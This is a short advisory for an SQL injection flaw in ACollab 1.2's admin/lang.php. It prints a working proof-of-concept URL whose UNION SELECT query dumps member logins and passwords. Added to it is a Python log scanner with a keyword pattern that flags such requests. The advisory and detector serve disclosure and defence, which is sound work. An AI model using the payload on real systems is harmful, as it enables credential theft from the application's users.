ACollab 1.2 SQL Injection

Description

An SQL injection vulnerability in ACollab 1.2 can be exploited to retrieve a list of usernames and passwords. Because the malicious string is stored in the session, it may be necessary to refresh the page.

Proof Of Concept

http://localhost/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a
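
A log check for requests shaped like the proof of concept above, as an added example that is not part of the original advisory: it decodes the t parameter of admin/lang.php and flags values outside an allowlist. The allowlist pattern, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Request line inside a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate values of `t` are short plain identifiers.
SAFE_T = re.compile(r"[A-Za-z0-9_-]{0,64}")
# Strings that appear in the advisory's proof of concept.
SQL_HINTS = re.compile(r"union\s+select|group_concat\s*\(|ac_members", re.I)

def fully_decode(value, rounds=3):
    """Undo repeated URL-encoding so a double-encoded quote is still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a reason string for a suspicious lang.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/admin/lang.php"):
        return None
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        if name != "t":
            continue
        value = fully_decode(raw)  # parse_qsl has already decoded once
        if SQL_HINTS.search(value):
            return "sql-keywords-in-t"
        if not SAFE_T.fullmatch(value):
            return "unexpected-characters-in-t"
    return None

def scan(lines):
    """Return (index, reason) for every flagged line."""
    return [(i, r) for i, l in enumerate(lines) if (r := inspect_line(l))]

# Constructed sample log lines (not taken from a real server).
LINE = '192.0.2.10 - - [01/Jan/2018:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
SAMPLE_LOG = [LINE.format(u) for u in (
    "/acollab/admin/lang.php?lang=en&t=template",
    "/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',"
    "GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a",
    "/acollab/admin/lang.php?lang=en&t=abc%2527",
    "/acollab/index.php?t=1",
)]
```

Because the injected string is stored in the session, a flagged request identifies the session to review; the response that exposed data may belong to a later request in that session that carries no payload.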


Copyright © 2018 AutoSec Tools LLC